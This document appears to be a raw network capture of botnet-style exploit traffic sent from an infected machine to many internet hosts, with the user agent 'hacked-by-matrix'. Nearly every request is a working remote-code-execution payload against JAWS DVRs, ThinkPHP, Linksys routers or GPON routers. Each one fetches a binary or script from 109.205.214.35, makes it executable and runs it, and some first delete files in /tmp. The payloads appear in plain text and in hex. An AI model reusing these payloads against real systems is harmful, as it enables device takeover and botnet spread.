                                                        Mar 21, 2024 05:23:46.328496933 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:46.505143881 CET440INHTTP/1.1 301 Moved Permanently
                                                        Date: Thu, 21 Mar 2024 04:23:46 GMT
                                                        Server: Apache
                                                        Location: https:///400.shtml
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 2f 34 30 30 2e 73 68 74 6d 6c 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https:///400.shtml">here</a>.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2089192.168.2.136085895.154.194.2880
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.386832952 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:46.544528008 CET502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 21 Mar 2024 04:23:46 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>
                                                        Mar 21, 2024 05:23:46.982428074 CET502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 21 Mar 2024 04:23:46 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2090192.168.2.134037895.100.62.6980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.412530899 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:47.372205973 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:47.556327105 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Thu, 21 Mar 2024 04:23:47 GMT
                                                        Date: Thu, 21 Mar 2024 04:23:47 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 37 66 39 30 61 31 37 26 23 34 36 3b 31 37 31 30 39 39 35 30 32 37 26 23 34 36 3b 32 34 66 34 35 37 65 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;47f90a17&#46;1710995027&#46;24f457e9</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2091192.168.2.133890045.132.88.3280
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.429619074 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:46.597309113 CET502INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:23:46 GMT
                                                        Server: Apache/2.4.52 (Ubuntu)
                                                        Content-Length: 308
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 65 61 6d 2e 61 63 65 62 6c 6f 78 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at team.aceblox.net Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2092192.168.2.134738038.174.71.22080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.476660013 CET44OUTGET /shell?cd+/tmp;rm+-rf+*;wge
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:46.642220974 CET16OUTData Raw: 2b 20 31 30
                                                        Data Ascii: + 10
                                                        Mar 21, 2024 05:23:46.801454067 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:23:46 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>
                                                        Mar 21, 2024 05:23:46.801542044 CET48OUTData Raw: 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 3b 63 68 6d 6f 64 2b 37 37 37 2b 2f 74 6d 70 2f 61 72 6d 3b
                                                        Data Ascii: 9.205.214.35/arm;chmod+777+/tmp/arm;
                                                        Mar 21, 2024 05:23:46.801542044 CET48OUTData Raw: 73 68 2b 2f 74 6d 70 2f 61 72 6d 34 20 6a 61 77 73 48 54 54 50 2f 31 2e 31 0d 0a 55 73 65 72 2d 41 67 65 6e
                                                        Data Ascii: sh+/tmp/arm4 jawsHTTP/1.1User-Agen


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2093192.168.2.1337566172.87.199.17955555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.538877964 CET426OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
                                                        Mar 21, 2024 05:23:50.700347900 CET426OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2094192.168.2.133731895.111.213.19280
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.541062117 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:47.050873995 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:47.211685896 CET339INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Thu, 21 Mar 2024 04:23:47 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2095192.168.2.133364443.230.167.9280
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.557461977 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:46.910787106 CET158INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64
                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2096192.168.2.13370065.13.244.251443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.885576963 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2097192.168.2.1344602118.3.51.20443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.885601044 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2098192.168.2.135883042.137.253.62443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.885629892 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2099192.168.2.133904442.151.189.155443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.885637045 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2100192.168.2.13583765.27.3.245443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.885677099 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2101192.168.2.13371025.0.184.79443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.885677099 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2102192.168.2.13331385.145.83.227443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.885710001 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
